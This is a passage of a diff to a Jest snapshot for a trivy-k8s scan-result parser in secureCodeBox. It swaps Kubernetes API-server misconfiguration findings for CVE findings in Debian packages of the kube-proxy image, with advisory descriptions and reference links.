"mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", - "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0013", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0018", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0018", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0019", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0019", - ], - }, - "category": "Misconfiguration", - "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", - "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0019", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0020", - ], - }, - "category": "Misconfiguration", - "description": "Retain the logs for at least 30 days or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", - "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0020", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -111789,231 +111581,97 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0021", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, - "category": "Misconfiguration", - "description": "Retain 10 or an appropriate number of old log files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", - "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0021", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0022", - ], - }, - "category": "Misconfiguration", - "description": "Rotate log files on reaching 100 MB or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", - "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0022", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], "severity": "LOW", @@ -112021,57 +111679,37 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -112079,57 +111717,37 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -112137,1118 +111755,992 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "4.13-3+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.8.2-beta.1", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-2253", - "installedVersion": "v2.8.1+incompatible", - "packageName": "github.com/docker/distribution", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2253", - "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", - "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", - "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", - "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", - "https://www.cve.org/CVERecord?id=CVE-2023-2253", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the \`/v2/_catalog\` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: \`n\`). This vulnerability allows a malicious user to submit an unreasonably large value for \`n,\` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "DoS from malicious API request", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2253", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2253", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2253", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - 